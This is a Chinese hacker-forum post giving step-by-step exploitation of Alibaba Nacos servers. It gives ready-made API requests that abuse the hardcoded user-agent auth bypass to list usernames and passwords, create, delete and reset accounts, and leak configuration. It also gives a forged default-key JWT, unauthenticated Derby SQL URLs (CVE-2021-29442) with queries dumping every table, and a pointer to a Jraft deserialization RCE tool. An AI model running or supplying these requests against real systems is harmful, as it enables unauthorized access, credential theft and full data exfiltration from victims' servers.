[漏洞利用] Nacos 漏洞利用

197 0
Honkers 2025-3-5 22:12:56 | 显示全部楼层 |阅读模式

Nacos 漏洞利用

1.漏洞描述:

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在Nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

影响版本:
Nacos <= 2.0.0-ALPHA.1

在某处漏洞挖掘过程中发现了该漏洞,于是记录一下如何利用该漏洞

2.Nacos权限认证绕过漏洞漏洞利用

1.访问出现以下界面,大概率会出现以下漏洞

2.1获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,如图

2.2任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?test111username=test111&password=123456

新建一个账号test111,可以看到创建用户成功,如图

使用该账号可以发现登录成功,如图

2.3任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

2.4用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?accessToken=&username=test111&newPassword=test222

可以看到用户密码更新成功,如图

2.5配置信息泄露

在路径后面加上:nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

3.Nacos 未开启服务器鉴权或使用了默认secret.key导致权限绕过漏洞(NVDB-CNVDB-2023674205

  1. /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
复制代码

4.Nacos关键功能认证机制缺失导致权限绕过漏洞(CVE-2021-29442)

config server中有个接口,没有做任何的鉴权,即可执行sql语句,可以泄漏全部数据

  1. /nacos/v1/cs/ops/derby?sql=select%20*%20from%20users%20
复制代码


查询所有表

  1. /nacos/v1/cs/ops/derby?sql=SELECT%20*%20FROM%20SYS.SYSTABLES%20WHERE%20TABLETYPE='T'
复制代码


通过测试,可以用以下的语句查询到所有数据库信息

  1. select * from users
  2. select * from permissions
  3. select * from roles
  4. select * from tenant_info
  5. select * from tenant_capacity
  6. select * from group_capacity
  7. select * from config_tags_relation
  8. select * from app_configdata_relation_pubs
  9. select * from app_configdata_relation_subs
  10. select * from app_list
  11. select * from config_info_aggr
  12. select * from config_info_tag
  13. select * from config_info_beta
  14. select * from his_config_info
  15. select * from config_info
复制代码

5.Nacos Jraft 反序列化漏洞(CNVD-2023-45001)

该漏洞源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反序列化,由于 Nacos 默认监听 7848 端口处理 Raft 协议请求,攻击者可以通过向 7848 端口发送恶意构造的数据包利用该漏洞,最终执行任意远程代码

漏洞影响产品

1.4.0 <= Alibaba Nacos < 1.4.6 使用cluster集群模式运行

2.0.0 <= Alibaba Nacos < 2.2.3 任意模式运行

访问/nacos/v1/console/server/state


查看版本是否受到影响
复现参考https://github.com/c0olw/NacosRce/

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Honkers

特级红客

关注
  • 3156
    主题
  • 36
    粉丝
  • 0
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行